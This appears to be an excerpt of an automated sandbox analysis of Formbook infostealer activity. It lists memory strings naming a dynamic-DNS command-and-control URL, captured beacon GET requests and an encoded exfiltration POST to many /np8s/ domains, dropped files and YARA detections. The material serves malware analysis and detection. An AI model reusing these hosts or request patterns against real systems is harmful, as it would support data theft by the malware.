Source: wscript.exe, 00000001.00000003.723753855.000001922CD85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723248716.000001922CD7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723487239.000001922CD85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723080195.000001922CD6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_
Source: wscript.exe, 00000001.00000002.837475499.000001922CD9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrea
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuE4
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuO
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuo
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 0000000F.00000002.813488182.000001D195830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredI
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredmFyIGN0
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreg
Source: wscript.exe, 0000000A.00000003.607735346.00000216DE10A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VregpOw
Source: wscript.exe, 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrei4
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrejIJ
Source: wscript.exe, 0000000A.00000003.759941914.00000216DE0D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrek
Source: wscript.exe, 0000000A.00000003.759941914.00000216DE0D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760062460.00000216DE0EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrem
Source: wscript.exe, 0000000A.00000003.607955279.00000216DE0F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2Pacv
Source: wscript.exe, 0000000A.00000002.831489692.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 0000000F.00000003.631938805.000001D1932EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo_
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreok
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreol
Source: wscript.exe, 00000001.00000003.723658631.000001922CD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreows
Source: wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrer
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.723658631.000001922CD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VretBgsX
Source: wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrew
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex
Source: wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex4
Source: wscript.exe, 00000001.00000002.837475499.000001922CD9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrez
Source: wscript.exe, 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre~42e
Source: wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723818246.000001922CD31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZ0
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZPl
Source: wscript.exe, 0000000D.00000003.789395297.0000013D917AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.631492043.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.632191346.0000013D917AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comu
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 47 62 6c 68 68 35 74 66 6c 78 4d 32 61 6a 63 4c 58 77 50 6e 6d 7e 53 68 5a 4c 48 61 4c 4e 48 63 72 64 51 36 30 59 2d 6a 32 61 76 6a 32 65 4e 6c 33 43 39 56 54 6a 65 65 58 61 4b 32 4f 78 6b 28 5a 7e 32 6d 68 36 6d 55 6d 52 70 43 79 76 78 71 36 69 72 56 69 4e 57 4b 69 36 38 4f 4a 44 45 6c 53 71 67 28 58 37 50 71 54 35 5f 62 64 44 4c 6a 61 46 6b 50 49 35 33 37 4f 52 54 57 4b 53 6a 72 4f 4a 37 71 70 56 43 61 6d 52 39 77 66 62 58 6c 43 69 65 54 2d 50 6f 65 43 71 66 7a 57 35 4c 39 30 69 76 65 73 7a 44 43 78 64 47 59 64 4a 32 50 57 42 47 70 5a 4e 66 6e 55 32 33 61 76 65 46 6a 7a 42 50 48 30 78 66 47 34 53 7a 56 32 52 79 72 66 6d 43 31 37 68 6f 6d 36 4a 49 59 64 31 33 42 4d 33 49 78 77 45 41 58 70 48 57 67 50 74 6c 77 65 75 42 70 4f 4e 6d 38 62 5a 6c 58 52 79 45 71 64 54 46 49 52 65 35 67 4c 58 73 50 33 39 52 73 49 6a 44 74 4a 68 48 4c 50 48 55 28 52 68 4d 55 75 59 72 35 67 6d 74 6f 44 48 7a 51 43 50 52 4b 55 36 35 4d 56 67 4a 75 63 6b 6c 4d 6c 54 6b 64 66 37 4a 6c 45 62 52 6a 78 44 6f 7e 56 35 70 77 43 45 34 64 38 32 4c 50 6d 37 63 72 34 4a 69 47 57 78 56 6b 46 37 46 41 5f 53 54 28 55 28 50 36 78 4d 54 73 35 43 4a 49 75 58 33 67 4d 73 71 70 56 41 4a 31 42 72 76 30 34 7e 4d 41 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=zJcaCGblhh5tflxM2ajcLXwPnm~ShZLHaLNHcrdQ60Y-j2avj2eNl3C9VTjeeXaK2Oxk(Z~2mh6mUmRpCyvxq6irViNWKi68OJDElSqg(X7PqT5_bdDLjaFkPI537ORTWKSjrOJ7qpVCamR9wfbXlCieT-PoeCqfzW5L90iveszDCxdGYdJ2PWBGpZNfnU23aveFjzBPH0xfG4SzV2RyrfmC17hom6JIYd13BM3IxwEAXpHWgPtlweuBpONm8bZlXRyEqdTFIRe5gLXsP39RsIjDtJhHLPHU(RhMUuYr5gmtoDHzQCPRKU65MVgJucklMlTkdf7JlEbRjxDo~V5pwCE4d82LPm7cr4JiGWxVkF7FA_ST(U(P6xMTs5CJIuX3gMsqpVAJ1Brv04~MAw).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.nachuejooj07.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brandingaloha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs2mn5+uwvQPb HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.udrivestorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU HTTP/1.1Host: www.lazarusnatura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=Gfubwqqm8fAzC8DVdPlLHb5iW2l0adCKSAamgQxpd8VH998tJyiM6MNptdcvbuHHsRLz HTTP/1.1Host: www.salondutaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

System Summary

barindex
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
